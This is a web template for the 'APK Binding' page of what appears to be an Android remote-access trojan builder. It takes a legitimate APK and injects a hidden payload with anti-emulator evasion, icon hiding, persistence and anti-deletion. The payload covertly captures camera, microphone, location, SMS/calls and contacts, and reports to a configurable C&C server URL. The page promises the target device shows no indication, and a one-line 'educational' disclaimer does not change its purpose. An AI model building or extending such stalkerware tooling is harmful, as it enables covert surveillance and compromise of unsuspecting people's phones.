{% extends "layout.html" %}

{% block title %}APK Binding{% endblock %}

{% block content %}
<div class="container mt-4">
    <div class="row">
        <div class="col-lg-8 mx-auto">
            <div class="card">
                <div class="card-header">
                    <h2 class="mb-0"><i class="fas fa-file-code"></i> APK Binding Tool</h2>
                </div>
                <div class="card-body">
                    <div class="alert alert-info">
                        <p><i class="fas fa-info-circle"></i> This tool allows you to bind the payload to a legitimate APK file. The resulting APK will include all monitoring and remote access capabilities while maintaining the functionality of the original application.</p>
                    </div>
                    
                    <form method="POST" enctype="multipart/form-data">
                        <div class="mb-4">
                            <h4>Step 1: Upload APK</h4>
                            <div class="input-group mb-3">
                                <input type="file" class="form-control" name="apk_file" accept=".apk">
                                <label class="input-group-text" for="apk_file"><i class="fas fa-file-upload"></i></label>
                            </div>
                            <div class="form-text">Select a legitimate APK file to bind with the payload.</div>
                        </div>
                        
                        <div class="mb-4">
                            <h4>Step 2: Configure Payload Options</h4>
                            <div class="row">
                                <div class="col-md-6">
                                    <div class="card mb-3">
                                        <div class="card-header">
                                            <h5 class="mb-0">Security Features</h5>
                                        </div>
                                        <div class="card-body">
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="anti_emulator" id="anti_emulator" checked>
                                                <label class="form-check-label" for="anti_emulator">
                                                    Anti-Emulator Detection
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="hide_app_icon" id="hide_app_icon">
                                                <label class="form-check-label" for="hide_app_icon">
                                                    Hide App Icon
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="persistent_across_reboots" id="persistent_across_reboots" checked>
                                                <label class="form-check-label" for="persistent_across_reboots">
                                                    Persist Across Reboots
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="anti_deletion" id="anti_deletion">
                                                <label class="form-check-label" for="anti_deletion">
                                                    Anti-Deletion Protection
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                
                                <div class="col-md-6">
                                    <div class="card mb-3">
                                        <div class="card-header">
                                            <h5 class="mb-0">Surveillance Features</h5>
                                        </div>
                                        <div class="card-body">
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="camera_access" id="camera_access" checked>
                                                <label class="form-check-label" for="camera_access">
                                                    Camera Access
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="mic_access" id="mic_access" checked>
                                                <label class="form-check-label" for="mic_access">
                                                    Microphone Access
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="location_access" id="location_access" checked>
                                                <label class="form-check-label" for="location_access">
                                                    Location Tracking
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="sms_access" id="sms_access" checked>
                                                <label class="form-check-label" for="sms_access">
                                                    SMS/Calls Monitoring
                                                </label>
                                            </div>
                                            <div class="form-check mb-2">
                                                <input class="form-check-input" type="checkbox" name="contacts_access" id="contacts_access" checked>
                                                <label class="form-check-label" for="contacts_access">
                                                    Contacts Access
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <div class="mb-3">
                                <label for="server_url" class="form-label">C&C Server URL</label>
                                <input type="text" class="form-control" id="server_url" name="server_url" 
                                       value="{{ request.host_url }}" placeholder="https://your-cc-server.com">
                                <div class="form-text">The server URL where the device will connect back to.</div>
                            </div>
                        </div>
                        
                        <div class="mb-3">
                            <h4>Step 3: Generate Bound APK</h4>
                            <button type="submit" class="btn btn-primary">
                                <i class="fas fa-cogs"></i> Generate Bound APK
                            </button>
                        </div>
                    </form>
                </div>
            </div>
            
            <div class="card mt-4">
                <div class="card-header">
                    <h4 class="mb-0"><i class="fas fa-info-circle"></i> Information</h4>
                </div>
                <div class="card-body">
                    <h5>APK Binding Process:</h5>
                    <ol>
                        <li>You upload a legitimate APK file</li>
                        <li>Our system decompiles the APK</li>
                        <li>The remote access payload is injected into the APK</li>
                        <li>Required permissions are added to the manifest</li>
                        <li>The APK is recompiled and signed</li>
                        <li>You download the modified APK with the payload</li>
                    </ol>
                    
                    <h5>Notes:</h5>
                    <ul>
                        <li>The bound APK will retain all original functionality</li>
                        <li>The target device will not show any indication of the payload running</li>
                        <li>For educational and authorized security testing only</li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</div>
{% endblock %}